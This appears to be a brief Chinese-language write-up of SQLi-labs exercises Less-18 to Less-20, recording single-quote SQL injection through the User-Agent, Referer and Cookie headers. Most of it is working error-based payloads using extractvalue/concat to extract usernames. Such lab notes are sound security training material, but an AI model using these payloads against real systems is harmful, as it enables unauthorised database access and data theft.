目录
Less-18
单引号user-agent注入判断
根据报错构造
1',1,1)# 验证成功
1',1,1‘)# 报错 说明构造的闭合语句成立
构造后语句如下
INSEERT INTO table VALUES('1' ,1,1)#','Ip','Username'),成功绕过
使用报错注入,直接检索前面获取的信息
1',1,extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)))# 成功
Less-19
单引号referer注入判断,根据报错可知输入内容从第二个参数起,后面的value为127.0.0.1
1’,1)# 绕过
1’,1’)# 报错
报错注入直接搜索前面获取的信息
1',extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)))# 成功
Less-20
Cookie处单引号注入
Cookie: uname=admin' # 绕过了
直接搜索前面了解的数据表情况
Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))# 成功